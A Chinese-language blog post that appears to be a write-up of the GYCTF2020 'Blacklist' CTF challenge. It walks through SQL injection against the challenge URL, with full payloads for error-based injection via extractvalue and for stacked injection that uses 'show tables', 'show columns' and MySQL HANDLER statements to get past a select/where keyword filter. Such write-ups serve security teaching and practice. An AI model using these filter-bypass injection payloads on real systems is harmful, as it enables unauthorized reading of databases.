zoukankan      html  css  js  c++  java

  • [GYCTF2020]Blacklist

    使用单引号进行闭合,发现报错

     尝试报错注入,发现过滤select,where关键字

    http://720c503a-2cc6-49df-b546-18f9725fb031.node3.buuoj.cn/?inject=1'and (extractvalue(1,concat(0x7e,(select database()),0x7e)))--+

     将select去掉,爆出数据库名

    http://720c503a-2cc6-49df-b546-18f9725fb031.node3.buuoj.cn/?inject=1'and (extractvalue(1,concat(0x7e,(database()),0x7e)))--+

     因为过滤了select和where关键字,报错注入不能进行下去,尝试使用堆叠注入

     查询表

    http://720c503a-2cc6-49df-b546-18f9725fb031.node3.buuoj.cn/?inject=1';show tables--+

     

     查询字段

    http://720c503a-2cc6-49df-b546-18f9725fb031.node3.buuoj.cn/?inject=1';show columns from FlagHere--+

     查询数据,因为select无法使用,可以用handler进行代替

    http://720c503a-2cc6-49df-b546-18f9725fb031.node3.buuoj.cn/?inject=1';handler FlagHere open;handler FlagHere read first;--+
  • 相关阅读:
    Unity中的欧拉旋转
    Unity-Rigidbody碰撞穿透
    C#实现单例模式的几种方法
    C#OO初级思想
    C#虚方法virtual
    数据库查询
    DNS 域名服务器搭建
    iptables 基本操作
    通过adb 操作手机
    linux 调整逻辑卷空间大小
  • 原文地址:https://www.cnblogs.com/gtx690/p/13280237.html
Copyright © 2011-2022 走看看